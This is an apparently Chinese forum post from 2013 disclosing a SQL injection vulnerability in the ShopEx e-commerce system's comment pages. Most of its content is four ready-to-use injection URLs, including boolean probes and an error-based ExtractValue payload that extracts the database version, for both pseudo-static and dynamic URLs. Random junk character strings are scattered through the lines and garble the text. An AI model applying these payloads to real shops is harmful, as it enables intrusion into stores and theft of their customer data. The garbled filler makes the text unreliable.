注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… & H* \6 ^) ]( a$ O0 _4 q
7 V: V" [ r8 z0 `% x
好吧,我扯远了~~
/ W% i* t% b( I: @1 T) X其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~; R4 h2 N1 O% E; i+ J
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: : `, h! J, ]/ Z2 s; x3 q
7 K, k9 i7 c& T, K: ohttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html , }0 f1 }: k, g$ {
% T6 i9 ^. L9 I) @
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
. V+ l( w( j+ Q. ^+ S2 w: Y$ O
) B( B# Q) f0 m! @ I0 Ghttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 9 l5 j+ K% y# v( h w
) C F( E3 D9 O" Hhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
% G5 k' t) \) y/ h: R" J, t7 i$ U: h: }* n' j2 ~
. |) H; I7 P0 O5 S; E一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
5 @0 ]% N) @4 ^9 S如何注入就不多说了,10多年的东西了…不会也会了…
3 ~3 x. y' S( h3 n! W
% q! l9 @" ?+ K U) e) N
+ w5 y0 L9 r \
* z8 f* A- z- R
5 f. t3 g. ]7 V, z/ n% |3 S |
发表于 2013-2-19 08:31:27
收藏
支持
反对